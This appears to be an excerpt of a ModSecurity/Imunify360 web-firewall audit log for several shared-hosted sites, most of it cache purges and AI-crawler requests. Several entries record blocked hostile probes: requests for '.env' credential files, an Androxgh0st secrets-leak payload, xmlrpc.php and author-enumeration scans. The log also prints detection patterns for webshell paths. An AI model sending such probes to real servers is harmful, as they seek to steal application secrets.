--d995ee2a-B-- GET /.well-known/acme-challenge/JYDW4RXETAUWB-P7S6V7-HZUI46B3R7N HTTP/1.1 Host: www.ihdb.in X-Real-IP: 103.185.74.40 X-Remote-IP: 172.70.108.135 x-forwarded-for: 103.185.74.40 User-Agent: Cpanel-HTTP-Client/1.0 cf-ray: 957fe1165e4be210-MRS accept-encoding: gzip cdn-loop: cloudflare; loops=1 
cf-connecting-ip: 103.185.74.40 cf-ipcountry: IN cf-visitor: {"scheme":"http"} X-Forwarded-Proto: http --d995ee2a-F-- HTTP/1.1 200 OK Last-Modified: Mon, 30 Jun 2025 18:55:39 GMT Accept-Ranges: bytes Content-Length: 64 --d995ee2a-H-- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:GET||Perf all:combined=2483, p1=96, p2=2325, p3=60, p4=2, p5=0, sr=52, sw=0, l=0, gc=0||Py scan:5826||Lua scan:||RBL:||RSV:7.05||RS:200||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751309739726820 6495 (- - -) Stopwatch2: 1751309739726820 6495; combined=2622, p1=96, p2=2325, p3=60, p4=2, p5=139, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d995ee2a-Z-- --330e181f-A-- [01/Jul/2025:00:25:40.372606 +0530] aGLdrAJAfdGKJNV61PbALQAAACc 20.171.207.232 57896 192.168.74.40 443 --330e181f-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-delhi/images/js/js/hotels-udaipur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --330e181f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --330e181f-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/aainag/js/images/testimonials/rajasthan-tours-from-delhi/images/js/js/hotels-udaipur.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/https/aainag/js/images/testimonials/rajasthan-tours-from-delhi/images/js/js/hotels-udaipur.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/https/aainag||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751309740354896 17994 (- - -) Stopwatch2: 1751309740354896 17994; combined=4172, p1=166, p2=3872, p3=0, p4=0, p5=134, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --330e181f-Z-- --1d8b6f0d-A-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751312680368233 14927 (- - -) Stopwatch2: 1751312680368233 14927; combined=3105, p1=121, p2=2866, p3=0, p4=0, p5=118, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --cfd4d159-Z-- --8ea6f201-A-- [01/Jul/2025:01:14:40.977406 +0530] aGLpJw1KYe_1zvYtnAA7WgAAABQ 103.185.74.40 47101 192.168.74.40 443 --8ea6f201-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --8ea6f201-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8ea6f201-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751312679746717 1231172 (- - -) Stopwatch2: 1751312679746717 1231172; combined=1960, p1=100, p2=1688, p3=0, p4=0, p5=171, sr=45, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --8ea6f201-Z-- --b2d2ac37-A-- [01/Jul/2025:01:14:41.591220 +0530] aGLpKW4-GUp1o4MFJsgz9gAAAAM 20.171.207.232 53288 192.168.74.40 443 --b2d2ac37-B-- GET /aaina/images/rajasthan-tours-from-ahmedabad/js/aainag/https/aainag/js/js/hotels-jaipur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b2d2ac37-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b2d2ac37-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751312681578236 14165 (- - -) Stopwatch2: 1751312681578236 14165; combined=2443, p1=107, p2=2194, p3=0, p4=0, p5=142, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b2d2ac37-Z-- --74f60876-A-- [01/Jul/2025:01:14:42.443692 +0530] aGLpKboqWpAcdxm0wrYe7AAAABc 103.185.74.40 10869 192.168.74.40 443 --74f60876-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --74f60876-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --74f60876-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751312681189648 1254299 (- - -) Stopwatch2: 1751312681189648 1254299; combined=3097, p1=122, p2=2820, p3=0, p4=0, p5=155, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --74f60876-Z-- --17d0c10f-A-- [01/Jul/2025:01:14:42.744438 +0530] aGLpKm4-GUp1o4MFJsgz9wAAAAM 20.171.207.232 53288 192.168.74.40 443 --17d0c10f-B-- GET /aaina/images/rajasthan-tours-from-ahmedabad/js/aainag/https/js/aainag/js/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --17d0c10f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --17d0c10f-H-- -- Message: Match of "rx ^POST" against "REQUEST_METHOD" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/005_i360_bruteforce.conf"] [line "242"] [id "77350636"] [msg "IM360 WAF: Access to login page in WordPress (counter)||RSV:7.05||RS:0||T:APACHE||MV:GET||"] [severity "NOTICE"] [tag "wp_core"] Stopwatch: 1751314719054762 3719 (- - -) Stopwatch2: 1751314719054762 3719; combined=2380, p1=62, p2=2181, p3=40, p4=1, p5=96, sr=45, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --1452e200-Z-- --6d30e93b-A-- [01/Jul/2025:01:48:39.891113 +0530] aGLxHkWWD_dwK1CpKjKSmAAAADg 103.185.74.40 16708 192.168.74.40 443 --6d30e93b-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --6d30e93b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --6d30e93b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751314718913411 979525 (- - -) Stopwatch2: 1751314718913411 979525; combined=2005, p1=81, p2=1755, p3=0, p4=0, p5=168, sr=44, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --6d30e93b-Z-- --40aabd4a-A-- [01/Jul/2025:01:48:41.062306 +0530] aGLxH-moPm-3dfW2AlUPKAAAAA0 73.135.86.44 50397 192.168.74.40 443 --40aabd4a-B-- POST /xmlrpc.php HTTP/1.1 Connection: Keep-Alive Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Content-Length: 680 Host: raghuveergears.com -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751314719858427 1204238 (- - -) Stopwatch2: 1751314719858427 1204238; combined=6886, p1=122, p2=5996, p3=300, p4=4, p5=374, sr=115, sw=90, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --40aabd4a-Z-- --bdaabb63-A-- [01/Jul/2025:01:48:41.099454 +0530] aGLxIPfqerEbFBfuaRySugAAAAE 103.185.74.40 10140 192.168.74.40 443 --bdaabb63-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --bdaabb63-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --bdaabb63-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751314720104378 995504 (- - -) Stopwatch2: 1751314720104378 995504; combined=2191, p1=98, p2=1964, p3=0, p4=0, p5=129, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --bdaabb63-Z-- --7196c327-A-- [01/Jul/2025:01:48:41.161499 +0530] aGLxHrJ1ylbid2ZhnGz3IQAAAD8 34.23.124.250 55841 192.168.74.40 443 --7196c327-B-- GET //?author=2 HTTP/1.1 Host: siaretech.in Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 --7196c327-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751316280020344 16116 (- - -) Stopwatch2: 1751316280020344 16116; combined=3117, p1=174, p2=2811, p3=0, p4=0, p5=132, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --991e5447-Z-- --a849486a-A-- [01/Jul/2025:02:14:40.336714 +0530] aGL3NvhZxmJseZYdTFfGFAAAAAY 103.185.74.40 57612 192.168.74.40 443 --a849486a-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --a849486a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a849486a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751316278539377 1797486 (- - -) Stopwatch2: 1751316278539377 1797486; combined=2220, p1=78, p2=1997, p3=0, p4=0, p5=144, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --a849486a-Z-- --a0a6f044-A-- [01/Jul/2025:02:14:41.193937 +0530] aGL3OYdYEi0AKX5dbhhkfgAAADE 20.171.207.232 50244 192.168.74.40 443 --a0a6f044-B-- GET /https/aainag/images/testimonials/https/js/js/aainag/hotels-udaipur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --a0a6f044-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a0a6f044-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751316282386240 15712 (- - -) Stopwatch2: 1751316282386240 15712; combined=2517, p1=117, p2=2210, p3=0, p4=0, p5=189, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2059b608-Z-- --84d1a61c-A-- [01/Jul/2025:02:14:42.861254 +0530] aGL3OPhZxmJseZYdTFfGFQAAAAY 103.185.74.40 44309 192.168.74.40 443 --84d1a61c-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --84d1a61c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --84d1a61c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751316280595082 2266478 (- - -) Stopwatch2: 1751316280595082 2266478; combined=2351, p1=83, p2=1967, p3=0, p4=0, p5=301, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --84d1a61c-Z-- --f303d62f-A-- [01/Jul/2025:02:14:43.576415 +0530] aGL3O4dYEi0AKX5dbhhkgAAAADE 20.171.207.232 50244 192.168.74.40 443 --f303d62f-B-- GET /https/aainag/images/testimonials/https/images/https/js/hotels-bikaner.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --f303d62f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f303d62f-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --0d9dc35b-Z-- --1541812f-A-- [01/Jul/2025:02:28:41.120100 +0530] aGL6gZdzv0GHXgI5ziCWPgAAAEY 196.251.88.57 52434 192.168.74.40 80 --1541812f-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive --1541812f-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --1541812f-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751317121116605 3874 (- - -) Stopwatch2: 1751317121116605 3874; combined=955, p1=92, p2=474, p3=0, p4=0, p5=389, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --1541812f-Z-- --2f3b0d6b-A-- [01/Jul/2025:02:28:41.271495 +0530] aGL6gVr_i253wrJd-GiW_QAAABM 57.141.0.6 53126 192.168.74.40 443 --2f3b0d6b-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-jodhpur/rajasthan-tours-from-jodhpur/Rajasthan-Travel-Guides/rajasthan-tours-from-udaipur/rajasthan-tours-from-udaipur/Rajasthan-Travel-Guides/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/testimonials/about-us.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --2f3b0d6b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --2f3b0d6b-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-jodhpur/rajasthan-tours-from-jodhpur/Rajasthan-Travel-Guides/rajasthan-tours-from-udaipur/rajasthan-tours-from-udaipur/Rajasthan-Travel-Guides/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/testimonials/about-us.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-jodhpur/rajasthan-tours-from-jodhpur/Rajasthan-Travel-Guides/rajasthan-tours-from-udaipur/rajasthan-tours-from-udaipur/Rajasthan-Travel-Guides/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/testimonials/about-us.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-Jaisalmer||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --51cd6564-Z-- --e6c0bb0a-A-- [01/Jul/2025:02:29:15.099753 +0530] aGL6o4iu6W1gdjTpockviAAAADA 196.251.88.57 58010 192.168.74.40 80 --e6c0bb0a-B-- POST / HTTP/1.1 Host: 103.185.74.40 User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Content-Length: 20 Content-Type: application/x-www-form-urlencoded --e6c0bb0a-C-- 0x%5B%5D=androxgh0st --e6c0bb0a-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --e6c0bb0a-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "280"] [id "77317941"] [msg "IM360 WAF: Laravel Apps Leaking Secrets exploit attempt||MV:androxgh0st||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P:0x[]=androxgh0st& F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751317155088402 11606 (- - -) Stopwatch2: 1751317155088402 11606; combined=2053, p1=133, p2=1517, p3=0, p4=0, p5=403, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e6c0bb0a-Z-- --fa10c130-A-- [01/Jul/2025:02:29:15.815822 +0530] aGL6o9OPV1xnJ9i3YWu6vgAAAEQ 216.73.216.230 48104 192.168.74.40 80 --fa10c130-B-- GET /robots.txt HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) Accept-Encoding: gzip, br, zstd, deflate Host: arts.net.in Via: 1.1 squid-proxy-5b5d847c96-krm6p (squid/6.10) X-Forwarded-For: 10.1.82.128 Cache-Control: max-age=259200 Connection: keep-alive --fa10c130-F-- HTTP/1.1 403 Forbidden X-Powered-By: PHP/7.4.33 Link: <http://arts.net.in/wp-json/>; rel="https://api.w.org/" -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --a701505a-Z-- --c2100242-A-- [01/Jul/2025:02:29:43.663449 +0530] aGL6v1r_i253wrJd-GiXAgAAABM 196.251.88.57 62747 192.168.74.40 443 --c2100242-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive --c2100242-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --c2100242-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751317183102199 561735 (- - -) Stopwatch2: 1751317183102199 561735; combined=786, p1=89, p2=537, p3=0, p4=0, p5=160, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
